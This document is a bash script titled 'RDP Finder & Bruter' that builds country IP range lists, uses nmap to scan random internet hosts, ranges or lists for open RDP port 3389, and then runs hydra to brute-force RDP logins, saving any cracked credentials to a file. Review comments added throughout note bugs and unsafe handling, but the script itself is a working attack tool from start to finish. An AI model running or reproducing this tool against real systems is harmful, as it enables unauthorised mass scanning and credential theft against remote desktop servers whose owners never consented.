#!/bin/bash
# RDP Finder & Bruter Script
#
# Requires NMAP & HYDRA (w/RDP Support)
#Start the magic....
# Directory for the two scratch files. /tmp is shared with every other user
# on the host, and the templates below have a fixed prefix with only three
# X's, so the names carry very little randomness.
JUNK=/tmp
# Second CLI argument; reused as the host count (-F), range (-R) or list
# path (-L) by rdp_find, and read from stdin again from the menu later.
SCANCOUNT="$2"
# Scratch files shared by all functions (menu lists, raw tool output, results).
STORAGE1=$(mktemp -p "$JUNK" -t fooooobar1.tmp.XXX)
STORAGE2=$(mktemp -p "$JUNK" -t fooooobar2.tmp.XXX)
# First a simple bashtrap function to handle an interrupt (CTRL+C).
# bash looks the handler up when the signal fires, so it may be defined below.
trap bashtrap INT
# Interrupt handler (CTRL+C): print a notice, remove the scratch files and
# terminate the whole script. Reads the globals STORAGE1 and STORAGE2.
function bashtrap(){
local scratch
printf '\n\n'
grep --color '.....shutting down now' <<<'CTRL+C has been detected!.....shutting down now'
# A scratch file may already be gone; rm diagnostics are not interesting here.
for scratch in "$STORAGE1" "$STORAGE2"; do
rm -f "$scratch" 2> /dev/null
done
exit;
}
#End bashtrap()
# Print the help text and exit. $0 is used for the example invocations.
# Each line is piped through `grep --color`, which highlights the quoted
# words only when stdout is a terminal (`--color` alone means auto).
function usage(){
echo
# NOTE(review): '||' in these -E patterns appears meant as a stand-in for the
# apostrophe; it creates an empty alternative, which matches every line, so
# the grep filters nothing here.
echo "HR's RDP Finder" | grep --color -E 'HR||s RDP Finder'
echo
echo "USAGE: $0 <ARG> <OPTION>" | grep --color 'USAGE'
echo "-G"
echo " [*] Genrate IP Range lists based on Country"
echo "-F <#>"
echo " [*] NMAP Scan of <#> random hosts checking for Enabled RDP Port"
echo "-R <IP-RANGE>"
echo " [*] NMAP Scan of <IP-RANGE> checking for Enabled RDP Port"
echo "-L </path/to/ip.lst>"
echo " [*] NMAP Scan using provided IP list (one per line) to check for Enabled RDP Port"
echo "-C"
echo " [*] Cracker Script with easy to follow prompts"
echo "-c"
echo " [*] Cracker Script with Username, IP and Password lists provided"
# The -c branch in main reads $2..$7 by position, hence the fixed order.
echo " [*] Requires -I/i, -U/u, and -P/p flags (ORDER SPECIFIC => I=>U=>P):"
echo " -U <USERNAME>"
echo " -u </path/to/users.lst>"
echo " -P </path/to/password.lst>"
echo " -p <password>"
echo " -I </path/to/ip.lst>"
echo " -i <IP>"
echo
echo "EX: $0 -G" | grep --color 'EX'
echo "EX: $0 -C" | grep --color 'EX'
echo "EX: $0 -F 1000" | grep --color 'EX'
echo "EX: $0 -R 192.168.0.0-192.168.3.255" | grep --color 'EX'
echo "EX: $0 -L /home/hood3drob1n/Desktop/ip.lst" | grep --color 'EX'
echo "EX: $0 -c -I /path/to/ip.lst -U Administrator -P /path/to/password.lst" | grep --color 'EX'
echo "EX: $0 -c -I /path/to/ip.lst -u /path/to/users.lst -P /path/to/password.lst" | grep --color 'EX'
echo "EX: $0 -c -I /path/to/ip.lst -u /path/to/users.lst -p \"P@ssw0rd1\"" | grep --color 'EX'
echo "EX: $0 -c -i 192.168.2.51 -U Administrator -P /path/to/password.lst" | grep --color 'EX'
echo "EX: $0 -c -i 192.168.2.51 -u /path/to/users.lst -P /path/to/password.lst" | grep --color 'EX'
echo
# No argument: the exit status is that of the last echo (0).
exit;
}
#End usage()
# Interactive helper behind -G: writes range_lists/<COUNTRY>_IP_ranges.lst
# from the per-country pages at services.ce3c.be, then offers to repeat.
# Globals read/written: STORAGE1 (country menu), STORAGE2 (raw range page),
# IP1..IP4, COUNTRY, continueAnswer.
# Everything here is derived from remote HTML parsed with sed/awk, and the
# chosen menu value is interpolated unquoted into the next URL; treat that
# content as untrusted input that shapes file names and URLs.
function generate_ip_range(){
if [ ! -d range_lists ]; then
mkdir range_lists
fi
echo "Please select which country to grab IP ranges for from the list below: " | grep --color 'Please select which country to grab IP ranges for from the list below'
# Grab actual list of Countries and use to present options menu to user.
# NOTE(review): awk inside the loop body reads the same stdin as `read`, so
# the body runs once over the remainder of the stream and the first line,
# consumed by `read`, is never used.
curl http://services.ce3c.be/ciprg/ -s | grep "href='?countrys=" | sed -e "s/<td><font size='2'><a href='?countrys=/'/g" -e 's/<\/tr><tr>//g' -e 's/<table><tr>//g' | while read line; do awk -F"'" '{ print $2 }' | sed '/^$/d' >> "$STORAGE1"; done;
# Numbered menu built from the file; the unquoted $(cat) word-splits on
# whitespace, so a multi-word entry would become several menu items.
select COUNTRY in $(cat "$STORAGE1")
do
echo "OK, grabbing IP range for $COUNTRY...." | grep --color -E 'OK||grabbing IP range for';
break
done
# COUNTRY (from the menu above) is placed in the URL unquoted.
curl http://services.ce3c.be/ciprg/?countrys=$COUNTRY -s > "$STORAGE2";
echo
echo "IP Ranges for: $COUNTRY" | grep --color 'IP Ranges for'
echo
# Expected line shape after the ':' is A.B.C.D-E.F.G.H; turning '-' into '.'
# yields eight dot-separated fields: start octets 1-4, end octets 5-8.
cat "$STORAGE2" | sort | uniq | awk -F":" '{ print $2 }' | while read line
do
firstOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $1 }')
firstOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $5 }')
secondOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $2 }')
secondOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $6 }')
thirdOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $3 }')
thirdOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $7 }')
fourthOctStart=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $4 }')
fourthOctEnd=$(echo "$line" | sed -e 's/\-/./g' | awk -F"." '{ print $8 }')
# Per octet: a single value when start and end agree, otherwise "start-end".
if [ "$firstOctStart" == "$firstOctEnd" ]; then
IP1="$firstOctStart"
else
IP1="$firstOctStart-$firstOctEnd"
fi
if [ "$secondOctStart" == "$secondOctEnd" ]; then
IP2="$secondOctStart"
else
IP2="$secondOctStart-$secondOctEnd"
fi
if [ "$thirdOctStart" == "$thirdOctEnd" ]; then
IP3="$thirdOctStart"
else
IP3="$thirdOctStart-$thirdOctEnd"
fi
if [ "$fourthOctStart" == "$fourthOctEnd" ]; then
IP4="$fourthOctStart"
else
IP4="$fourthOctStart-$fourthOctEnd"
fi
# The backticks only re-echo COUNTRY; the value also names the output file.
echo "$IP1.$IP2.$IP3.$IP4" >> range_lists/`echo $COUNTRY`_IP_ranges.lst
done
cat range_lists/`echo $COUNTRY`_IP_ranges.lst
echo
echo "Do you want to continue generating Country IP Lists? (y/n)" | grep --color -E 'Do you want to continue generating Country IP Lists||y||n'
# `read` without -r: backslashes in the answer are interpreted.
read continueAnswer
echo
if [ "$continueAnswer" == 'y' ] || [ "$continueAnswer" == 'Y' ]; then
# Reset the scratch files (to a single empty line) and the octet variables,
# then recurse for the next country.
echo '' > "$STORAGE1"
echo '' > "$STORAGE2"
IP1=""
IP2=""
IP3=""
IP4=""
clear
generate_ip_range
else
clear
usage
fi
}
# Scan for hosts with TCP/3389 open and merge them into rdp_enabled/rdp-ip.lst.
# Globals read: METH (1 = random hosts via nmap -iR, 2 = the target/range
# passed on the command line, 3 = a list file via nmap -iL), SCANCOUNT (the
# count, range or path, depending on METH), STORAGE1, STORAGE2.
# Globals written: TRACKER, EXISTING, UPDATED, FOUNDED; the menu at the end
# may reassign METH and SCANCOUNT before recursing into this function or
# rdp_cracker, so it does not return to its caller in those cases.
function rdp_find(){
if [ ! -d rdp_enabled ]; then
mkdir rdp_enabled
fi
# TRACKER=1 means a list already existed, so a "just found" delta is reported.
TRACKER=0
if [ -e rdp_enabled/rdp-ip.lst ]; then
EXISTING=$(wc -l rdp_enabled/rdp-ip.lst | cut -d' ' -f1)
# Seed the scratch file with the earlier results so the merge keeps them.
cat rdp_enabled/rdp-ip.lst > "$STORAGE1" 2> /dev/null
TRACKER=1
fi
echo "Please hang tight, this might take a few...." | grep --color -E 'Please hang tight||this might take a few'
echo '...'
# nmap's grepable output (-oG) goes to STORAGE2; only when nmap exits 0 are
# the "/open/" lines parsed and the address field appended to STORAGE1.
# The three branches differ only in how the target set is supplied.
if [ "$METH" == 3 ]; then
nmap -iL "$SCANCOUNT" -T5 -PN -p 3389 -oG "$STORAGE2" > /dev/null && grep '/open/' "$STORAGE2" |cut -d' ' -f2,4 | sed -e 's/\/open\/tcp\/\/ms-term-serv\/\/\///g' | awk '{ print $1 }' >> "$STORAGE1"
elif [ "$METH" == 2 ]; then
nmap "$SCANCOUNT" -T5 -PN -p 3389 -oG "$STORAGE2" > /dev/null && grep '/open/' "$STORAGE2" |cut -d' ' -f2,4 | sed -e 's/\/open\/tcp\/\/ms-term-serv\/\/\///g' | awk '{ print $1 }' >> "$STORAGE1"
else
nmap -iR "$SCANCOUNT" -T5 -PN -p 3389 -oG "$STORAGE2" > /dev/null && grep '/open/' "$STORAGE2" |cut -d' ' -f2,4 | sed -e 's/\/open\/tcp\/\/ms-term-serv\/\/\///g' | awk '{ print $1 }' >> "$STORAGE1"
fi
# De-duplicate into the persistent list.
cat "$STORAGE1" | sort | uniq > rdp_enabled/rdp-ip.lst 2> /dev/null
if [ "$TRACKER" == 1 ]; then
# NOTE(review): UPDATED counts STORAGE1 before the sort|uniq above, so it
# can be larger than the number of lines actually written to rdp-ip.lst.
UPDATED=$(wc -l "$STORAGE1" | cut -d' ' -f1)
FOUNDED=$(($UPDATED-$EXISTING))
echo
echo "Total in List: $UPDATED" | grep --color 'Total in List'
echo "Just Found: $FOUNDED" | grep --color 'Just Found'
echo
cat rdp_enabled/rdp-ip.lst
else
FOUNDED=$(wc -l rdp_enabled/rdp-ip.lst | cut -d' ' -f1)
echo
echo "Just Found: $FOUNDED" | grep --color 'Just Found'
echo
cat rdp_enabled/rdp-ip.lst
fi
echo
echo "What now?" | grep --color 'What now'
# Follow-up menu. Neither non-Exit choice returns here; each recurses.
select continue_options in "Awaken the Crackin" "Scan Random Hosts" "Exit"
do
case $continue_options in
"Awaken the Crackin")
clear
# n00ber selects the interactive prompt path in rdp_cracker.
METH=n00ber
rdp_cracker
;;
"Scan Random Hosts")
echo
echo "How many random hosts to scan now?" | grep --color 'How many random hosts to scan now'
# Overrides the global that was originally taken from $2.
read SCANCOUNT
echo
METH=1
clear
rdp_find
;;
Exit)
echo
echo "All done here, hope you found enough open ports....." | grep --color -E 'All done here||hope you found enough open ports'
echo
exit
;;
*)
# Invalid selection: print a blank line and show the menu again.
echo
;;
esac
done
}
#End rdp_find()
# Run hydra against the RDP hosts with the credential arguments assembled
# either here interactively (METH == n00ber) or by the -c branch in main.
# Globals read: METH, abc (user argument), def (password argument),
# ghi (-M list file or a single host), STORAGE1.
# Globals written: IPLIST, RDPNAME, PASSLIST, abc, def, ghi.
# Output: appends hydra's per-host result lines to rdp_results/rdp.results,
# i.e. any recovered credentials are stored on disk in clear text with the
# default umask.
function rdp_cracker(){
if [ ! -d rdp_results ]; then
mkdir rdp_results
fi
if [ "$METH" == n00ber ]; then
echo
echo "Before we awaken the crackin we must get some info..." | grep --color 'Before we awaken the crackin we must get some info'
echo "Checking for default rdp_enabled/rdp-ip.lst file...." | grep --color -E 'Checking for default rdp||enabled||rdp||ip||lst file'
if [ ! -e rdp_enabled/rdp-ip.lst ]; then
echo '...'
echo "Can't find rdp-ip.lst file! Please provide path to ip list to use: " | grep --color -E 'Can||t find rdp||ip||lst file||Please provide path to ip list to use'
# `read` without -r; the path is not checked for readability here.
read IPLIST
ghi="-M $IPLIST"
echo
else
echo '...'
echo '......found!' | grep 'found'
IPLIST=rdp_enabled/rdp-ip.lst
ghi="-M $IPLIST"
echo
fi
echo "Please provide username to attack: " | grep --color 'Please provide username to attack'
read RDPNAME
abc="-l $RDPNAME"
echo
echo "Please provide path to password list to use for cracking: " | grep --color 'Please provide path to password list to use for cracking'
read PASSLIST
if [ ! -r "$PASSLIST" ]; then
echo
echo "Can't read provided password list! Please check path or permissions and try again...." | grep --color -E 'Can||t read provided password list||Please check path or permissions and try again'
echo
# NOTE(review): no function named `cracker` is defined in this file, so this
# fails with "command not found" and execution falls through to the hydra
# run below with the unreadable path still in PASSLIST.
cracker
fi
def="-P $PASSLIST"
# Keep an earlier results file, suffixed with the current hour.
if [ -e rdp_results/rdp.results ]; then
mv rdp_results/rdp.results "rdp_results/rdp.results_`date +%Y%m%d%H`.bk"
fi
fi
echo
echo "OK, now let us awaken the crackin....." | grep --color -E 'OK||now let us awaken the crackin'
echo "Hang tight, this will take a few...." | grep --color -E 'Hang tight||this will take a few'
# abc/def/ghi are left unquoted on purpose so each "flag value" string splits
# into two words; a path containing whitespace would therefore break here.
# hydra's stderr is discarded; its findings are written to STORAGE1 via -o.
hydra -v $abc $def $ghi rdp -e ns -t 10 -W 3 -f -o "$STORAGE1" 2> /dev/null
echo
echo "Results:" | grep --color 'Results'
# Echo each output line from the "3389" field on, once to the screen and once
# into the results file. `echo $line` is unquoted, so whitespace is collapsed.
cat "$STORAGE1" | while read line
do
echo $line | awk -F"3389" '{ print $2 }' | sed -e 's/\]\[rdp\] //g' | grep --color -E 'host||login||password'
echo $line | awk -F"3389" '{ print $2 }' | sed -e 's/\]\[rdp\] //g' >> rdp_results/rdp.results
done
echo
echo "The crackin has gone to rest, check the rdp.results file for the full details...." | grep --color -E 'The crackin has gone to rest||check the rdp||results file for the full details'
}
#MAIN-----------------------------------------------------
# Entry point: dispatch on the first flag. Every branch either exits or runs
# its function to completion before getopts continues.
clear
#Check to ensure arguments passed or provide usage info for dummies
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ]; then
usage
fi
# Remove a leftover hydra.restore from the working directory (presumably a
# session file left by an interrupted earlier run).
if [ -e hydra.restore ]; then
rm -f hydra.restore 2> /dev/null
fi
# NOTE(review): `c:` makes -c consume the next word (-I or -i) as OPTARG, and
# the `,` is accepted as an option letter of its own; the -c branch ignores
# OPTARG and reads $2..$7 positionally instead. F/R/L take their value from
# SCANCOUNT, which was set to "$2" at the top of the file.
while getopts ":F:R:L:c:G,C" usage_options;
do
case $usage_options in
F)
METH=1
rdp_find
;;
R)
METH=2
rdp_find
;;
L)
# For -L, SCANCOUNT is the path of the list file.
if [ ! -r "$SCANCOUNT" ]; then
echo
echo "Can't read provided IP list file! Check path or permissions and re-try....." | grep --color -E 'Can||t read provided IP list file||Check path or permissions and re||try'
echo
exit;
else
METH=3
rdp_find
fi
;;
C)
METH=n00ber
rdp_cracker
;;
c)
METH=advanced
# Exactly seven words are expected: -c, then three flag/value pairs in the
# fixed order I/i, U/u, P/p.
if [ $# -lt 7 ]; then
echo
echo "This option requires -U/u, -P/p and -I/i options to work, please review usage and re-run script...." | grep --color -E 'This option requires||U||u||P||p and||I||i options to work||please review usage and re||run script'
echo
usage
fi
if [ "$2" == "-I" ]; then
IPLIST="$3"
if [ ! -r "$IPLIST" ]; then
echo
echo "Can't read provided IP list! Please check path or permissions and try again...." | grep --color -E 'Can||t read provided IP list||Please check path or permissions and try again'
echo
usage
fi
ghi="-M $IPLIST"
elif [ "$2" == "-i" ]; then
IPLIST="$3"
ghi="$IPLIST"
fi
if [ "$4" == "-U" ]; then
RDPNAME="$5"
abc="-l $RDPNAME"
elif [ "$4" == "-u" ]; then
RDPNAME="$5"
abc="-L $RDPNAME"
fi
if [ "$6" == "-P" ]; then
PASSLIST="$7"
# NOTE(review): unlike the -I check above, this only prints a message and
# continues with the unreadable path.
if [ ! -r "$PASSLIST" ]; then
echo
echo "Can't read provided password list! Please check path or permissions and try again...." | grep --color -E 'Can||t read provided password list||Please check path or permissions and try again'
echo
fi
def="-P $PASSLIST"
elif [ "$6" == "-p" ]; then
PASSLIST="$7"
def="-p $PASSLIST"
fi
# Keep an earlier results file, suffixed with the current hour.
if [ -e rdp_results/rdp.results ]; then
mv rdp_results/rdp.results "rdp_results/rdp.results_`date +%Y%m%d%H`.bk"
fi
rdp_cracker
;;
G)
echo
generate_ip_range
;;
*)
usage
;;
esac
done
echo
echo
echo "All done here, hope you found what you were looking for....." | grep --color -E 'All done here||hope you found what you were looking for'
echo
echo "Until next time, Enjoy!" | grep --color -E 'Until next time||Enjoy'
echo
# Normal-exit cleanup of the scratch files; bashtrap does the same on CTRL+C.
rm -f "$STORAGE1" 2> /dev/null
rm -f "$STORAGE2" 2> /dev/null
#EOF